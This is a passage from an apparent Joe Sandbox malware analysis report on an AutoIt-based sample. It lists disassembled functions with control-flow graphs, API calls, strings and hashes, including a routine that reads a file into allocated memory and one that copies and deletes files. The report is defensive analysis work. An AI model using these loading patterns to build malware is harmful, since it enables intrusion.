                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bdbdcb516b41f2199fafdec64757545d3685a5e52768c8844dadaf665599d01
                                                                      • Instruction ID: 7295aff2e4bcdf2238edd0132d2a23a8bba2a8a2fee7f410a3fd238b7029ab40
                                                                      • Opcode Fuzzy Hash: 3bdbdcb516b41f2199fafdec64757545d3685a5e52768c8844dadaf665599d01
                                                                      • Instruction Fuzzy Hash: 96C1D274A04289AFDB11DFA8D881BADFBF5EF09310F1441DAF519AB392E7309941CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00112650 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 606 112650-1126fe call 110000 609 112705-11272b call 113560 CreateFileW 606->609 612 112732-112742 609->612 613 11272d 609->613 618 112744 612->618 619 112749-112763 VirtualAlloc 612->619 614 11287d-112881 613->614 615 1128c3-1128c6 614->615 616 112883-112887 614->616 620 1128c9-1128d0 615->620 621 112893-112897 616->621 622 112889-11288c 616->622 618->614 623 112765 619->623 624 11276a-112781 ReadFile 619->624 625 1128d2-1128dd 620->625 626 112925-11293a 620->626 627 1128a7-1128ab 621->627 628 112899-1128a3 621->628 622->621 623->614 631 112783 624->631 632 112788-1127c8 VirtualAlloc 624->632 633 1128e1-1128ed 625->633 634 1128df 625->634 635 11294a-112952 626->635 636 11293c-112947 VirtualFree 626->636 629 1128bb 627->629 630 1128ad-1128b7 627->630 628->627 629->615 630->629 631->614 637 1127ca 632->637 638 1127cf-1127ea call 1137b0 632->638 639 112901-11290d 633->639 640 1128ef-1128ff 633->640 634->626 636->635 637->614 646 1127f5-1127ff 638->646 643 11291a-112920 639->643 644 11290f-112918 639->644 642 112923 640->642 642->620 643->642 644->642 647 112801-112830 call 1137b0 646->647 648 112832-112846 call 1135c0 646->648 647->646 653 112848 648->653 654 11284a-11284e 648->654 653->614 656 112850-112854 CloseHandle 654->656 657 11285a-11285e 654->657 656->657 658 112860-11286b VirtualFree 657->658 659 11286e-112877 657->659 658->659 659->609 659->614
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00112721
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00112947
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                                      • Instruction ID: 64025bea54c5aadf56d55b27788d5c2507f5638213486a0094376ab8d8107d8f
                                                                      • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                                      • Instruction Fuzzy Hash: 2FA11874E00209EBDB18CFA4C894BEEBBB5FF58304F208169E515BB280D7759A91DF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 670 ba2c63-ba2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                                      • Instruction ID: a48c3de1440006b2c8658a92cfc95de2b1ba6c8dbf49228059e5364e3d3a646d
                                                                      • Opcode Fuzzy Hash: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                                      • Instruction Fuzzy Hash: CEF0B7755503907AEB211B2BAC49F7F2EBDD7C6F50F05405AFD08A25B0C6615890DAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 671 bd61fe-bd6217 672 bd622d-bd6232 671->672 673 bd6219-bd6229 call bdfe21 671->673 675 bd623f-bd6263 MultiByteToWideChar 672->675 676 bd6234-bd623c 672->676 673->672 680 bd622b 673->680 678 bd6269-bd6275 675->678 679 bd63f6-bd6409 call bc0a8c 675->679 676->675 681 bd62c9 678->681 682 bd6277-bd6288 678->682 680->672 684 bd62cb-bd62cd 681->684 685 bd628a-bd6299 call be2040 682->685 686 bd62a7-bd62b8 call bd3820 682->686 689 bd63eb 684->689 690 bd62d3-bd62e6 MultiByteToWideChar 684->690 685->689 696 bd629f-bd62a5 685->696 686->689 697 bd62be 686->697 694 bd63ed-bd63f4 call bd1537 689->694 690->689 693 bd62ec-bd62fe call bd3467 690->693 701 bd6303-bd6307 693->701 694->679 700 bd62c4-bd62c7 696->700 697->700 700->684 701->689 703 bd630d-bd6314 701->703 704 bd634e-bd635a 703->704 705 bd6316-bd631b 703->705 706 bd635c-bd636d 704->706 707 bd63a6 704->707 705->694 708 bd6321-bd6323 705->708 709 bd636f-bd637e call be2040 706->709 710 bd6388-bd6399 call bd3820 706->710 711 bd63a8-bd63aa 707->711 708->689 712 bd6329-bd6343 call bd3467 708->712 714 bd63e4-bd63ea call bd1537 709->714 726 bd6380-bd6386 709->726 710->714 727 bd639b 710->727 713 bd63ac-bd63c5 call bd3467 711->713 711->714 712->694 724 bd6349 712->724 713->714 728 bd63c7-bd63ce 713->728 714->689 724->689 729 bd63a1-bd63a4 726->729 727->729 730 bd640a-bd6410 728->730 731 bd63d0-bd63d1 728->731 729->711 732 bd63d2-bd63e2 WideCharToMultiByte 730->732 731->732 732->714 733 bd6412-bd6419 call bd1537 732->733 733->694
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC82D9,00BC82D9,?,?,?,00BD644F,00000001,00000001,8BE85006), ref: 00BD6258
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD644F,00000001,00000001,8BE85006,?,?,?), ref: 00BD62DE
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD63D8
                                                                      • __freea.LIBCMT ref: 00BD63E5
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • __freea.LIBCMT ref: 00BD63EE
                                                                      • __freea.LIBCMT ref: 00BD6413
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 24f3f6e2a8dcc2e8b8ffe5c417352a57060319068abb08079c98cb7a166dc64f
                                                                      • Instruction ID: 02be3f281eb55d4ce54846e5576871e998d23ef11b2ef2c7634a17ac24a465c1
                                                                      • Opcode Fuzzy Hash: 24f3f6e2a8dcc2e8b8ffe5c417352a57060319068abb08079c98cb7a166dc64f
                                                                      • Instruction Fuzzy Hash: 5F51D172A00216ABDB258F68DC81FAFB7E9EB44720F1546AAFC05D6241FB34DC44D664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA10F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                                        • Part of subcall function 00BA1B4A: RegisterWindowMessageW.USER32(00000004,?,00BA12C4), ref: 00BA1BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA136A
                                                                      • OleInitialize.OLE32 ref: 00BA1388
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BE24AB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: 0`$PQ
                                                                      • API String ID: 1986988660-2589806630
                                                                      • Opcode ID: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                                      • Instruction ID: 2cac8da65eb89a586f56828bafc3c1507a904ce9666d110ab220d230a23cbbd1
                                                                      • Opcode Fuzzy Hash: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                                      • Instruction Fuzzy Hash: A271AAB49253408ECBC8EF7DA88675D3AE4FB8935475D866AEC0ED72A1EB304484CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00112410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 893 112410-11254f call 110000 call 112300 CreateFileW 900 112551 893->900 901 112556-112566 893->901 902 112606-11260b 900->902 904 112568 901->904 905 11256d-112587 VirtualAlloc 901->905 904->902 906 112589 905->906 907 11258b-1125a2 ReadFile 905->907 906->902 908 1125a4 907->908 909 1125a6-1125e0 call 112340 call 111300 907->909 908->902 914 1125e2-1125f7 call 112390 909->914 915 1125fc-112604 ExitProcess 909->915 914->915 915->902
                                                                      APIs
                                                                        • Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112545
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: 49T162P2GOOE5STNI9C08CIABB6L5I
                                                                      • API String ID: 2694422964-1706107533
                                                                      • Opcode ID: f33ae436302edade2c2f5e62e3ea122bf7bfad632a8b621af2e3e5f3bd20854f
                                                                      • Instruction ID: dbc64782969a37c2c0247f2aa44b35296256cfdade502177a97d71a62a2266e0
                                                                      • Opcode Fuzzy Hash: f33ae436302edade2c2f5e62e3ea122bf7bfad632a8b621af2e3e5f3bd20854f
                                                                      • Instruction Fuzzy Hash: 3E619530D04288DAEF16DBF4C854BDEBBB96F15304F044199E6447B2C1C7B90B88CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BADFD0 Relevance: 8.4, APIs: 2, Strings: 2, Instructions: 1414COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.$hk
                                                                      • API String ID: 0-3564439943
                                                                      • Opcode ID: 31f6c99b8712994aabc89df9728a35b24e19310f8e100c967a286c8201a4a6f5
                                                                      • Instruction ID: 382387238894c04fe7f9a963349100f74c9b6c0fee14a15923caecc386f0806f
                                                                      • Opcode Fuzzy Hash: 31f6c99b8712994aabc89df9728a35b24e19310f8e100c967a286c8201a4a6f5
                                                                      • Instruction Fuzzy Hash: 70C28A70A04215CFCB24CF58C880AADB7F1FF4A710F2485A9E926AB391D775ED85CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C12947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1427 c12947-c129b9 call be1f50 call c125d6 call bbfe0b call ba5722 call c1274e call ba511f call bc5232 1442 c12a6c-c12a73 call c12e66 1427->1442 1443 c129bf-c129c6 call c12e66 1427->1443 1448 c12a75-c12a77 1442->1448 1449 c12a7c 1442->1449 1443->1448 1450 c129cc-c12a6a call bcd583 call bc4983 call bc9038 call bcd583 call bc9038 * 2 1443->1450 1451 c12cb6-c12cb7 1448->1451 1453 c12a7f-c12b3a call ba50f5 * 8 call c13017 call bce5eb 1449->1453 1450->1453 1454 c12cd5-c12cdb 1451->1454 1492 c12b43-c12b5e call c12792 1453->1492 1493 c12b3c-c12b3e 1453->1493 1457 c12cf0-c12cf6 1454->1457 1458 c12cdd-c12ced call bbfdcd call bbfe14 1454->1458 1458->1457 1496 c12bf0-c12bfc call bce678 1492->1496 1497 c12b64-c12b6c 1492->1497 1493->1451 1504 c12c12-c12c16 1496->1504 1505 c12bfe-c12c0d DeleteFileW 1496->1505 1498 c12b74 1497->1498 1499 c12b6e-c12b72 1497->1499 1501 c12b79-c12b97 call ba50f5 1498->1501 1499->1501 1511 c12bc1-c12bd7 call c1211d call bcdbb3 1501->1511 1512 c12b99-c12b9e 1501->1512 1507 c12c91-c12ca5 CopyFileW 1504->1507 1508 c12c18-c12c7e call c125d6 call bcd2eb * 2 call c122ce 1504->1508 1505->1451 1509 c12ca7-c12cb4 DeleteFileW 1507->1509 1510 c12cb9-c12ccf DeleteFileW call c12fd8 1507->1510 1508->1510 1532 c12c80-c12c8f DeleteFileW 1508->1532 1509->1451 1519 c12cd4 1510->1519 1526 c12bdc-c12be7 1511->1526 1516 c12ba1-c12bb4 call c128d2 1512->1516 1527 c12bb6-c12bbf 1516->1527 1519->1454 1526->1497 1529 c12bed 1526->1529 1527->1511 1529->1496 1532->1451
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12C05
                                                                      • DeleteFileW.KERNEL32(?), ref: 00C12C87
                                                                      • CopyFileW.KERNEL32 ref: 00C12C9D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CAE
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: 02aaab5e85b41277e07e8bdb0b0f3f93fb49352c85bad9cbdab24a67051d9844
                                                                      • Instruction ID: bd187421c508937b840c64f8433b0d8881b8d8373cfcb53ef35fcc95b7bbad11
                                                                      • Opcode Fuzzy Hash: 02aaab5e85b41277e07e8bdb0b0f3f93fb49352c85bad9cbdab24a67051d9844
                                                                      • Instruction Fuzzy Hash: 6FB16F75D00119ABDF21DBA4CC85EEEB7BDEF09350F1040AAF609E6141EB309B949FA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD86AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00BD8704
                                                                      • GetLastError.KERNEL32(?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD870E
                                                                      • __dosmaperr.LIBCMT ref: 00BD8739
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID: P,
                                                                      • API String ID: 2583163307-1625735819
                                                                      • Opcode ID: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                                      • Instruction ID: ec4793a7e545bc96244883514d40a2ac4c2e1ce305a0253b7fc102a5f01456f4
                                                                      • Opcode Fuzzy Hash: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                                      • Instruction Fuzzy Hash: DB018E3660566026D27467346885B7EEBC9CB81776F3901DBF8199B3D2FEA0CC818254
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32 ref: 00BA3B40
                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00BA3B61
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BA3B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                                      • Instruction ID: 0c6927233e4692cb64434c16aa44e2443da6f074418bf5b0aeb08b64548914fc
                                                                      • Opcode Fuzzy Hash: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                                      • Instruction Fuzzy Hash: A5112AB5525208FFDB208FA5DC85AAEB7F9EF05B44B504499B805E7110D3319E4097A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BA13C6,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue), ref: 00BD30A5
                                                                      • GetLastError.KERNEL32(?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46), ref: 00BD30B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000), ref: 00BD30BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                                      • Instruction ID: 3844657a976c7a76db754bd295f8195f292a9e4745068593cc076d5609913e0d
                                                                      • Opcode Fuzzy Hash: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                                      • Instruction Fuzzy Hash: 7701D436311222ABCB214A78AC84B5FBBD8EF05F61B240662F909F3242E721D901C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                                        • Part of subcall function 00BC32A4: RaiseException.KERNEL32(?,?,?,00BC068A,?,00C71444,?,?,?,?,?,?,00BC068A,00BA1129,00C68738,00BA1129), ref: 00BC3304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: 27830cf8d18001f4028d5a76c9b6e9515578cf62467896d70aac20cf7f36ceed
